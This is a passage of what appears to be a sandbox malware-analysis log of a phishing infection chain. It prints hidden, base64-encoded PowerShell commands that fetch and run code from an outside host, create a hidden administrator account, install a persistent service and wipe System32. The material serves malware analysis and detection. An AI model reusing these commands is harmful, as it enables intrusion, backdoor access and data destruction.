F0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""
      Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: unknownProcess created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: unknownProcess created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsheLL -W hIdden -nolOgo -noP -EP ByPass -encoDEDcOmmand "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABJAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAHIAaQBuAGcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHAANABVADIAdABZAE4AZwA9AD0AIgApACkAKQApAC4AQwBPAG4AVABlAE4AdAApACkA" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\t1fagedb\t1fagedb.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3C76.tmp" "c:\Users\user\AppData\Local\Temp\t1fagedb\CSC5EF4F498469D4A7EB6829710C89A123D.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANwAxAGIAYwBlADkAOQBiADcANQAwADIAYgAxADkAZgBmADIAYQAwADcAOQAwADUAYQBiADIAZAAxADMAMwA5AGMANwAwADkAZgBlAGIAYQAyADkAZAA3ADEAMQBiADMANABjAGQAZAA0ADkAYQAyADgAMQBlADMANQAzADMAMAA5ADYANAA0AGMANQAxADYAMwBhAGQAYwA2AGYAYgA0AGEAMwAxADUANAA4AGEAZQAwADMAYQBlADMAZQA5ADIANAAxADkANAAzADUAOAA4ADEAZQBlAGUAYgBlADcAZgA0AGEAZQAxAGMAMgA2ADIANgBhADMANABkADcAZQBjADIAZgBhADcAZQBiADgAOABiADYAYQBjAGEANwA3AGYAMAA4ADgAYwBkADQAZAA0ADkAYgAwADkANQAwADQANQBjADIAOAA1ADMANQBkAGYANwAwAGUANQBhAGIANQBkADAAYQAyAGIANQBiADAAYwA4AGEAZAAzAGUAOAAzAGIANgBjADgANgBiAGQAYQA5AGQANQBkADcAMgAwAGUAZgA1ADUAYgA1ADAAOQBkADQANwAzADQAYQAzADQAOABlACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
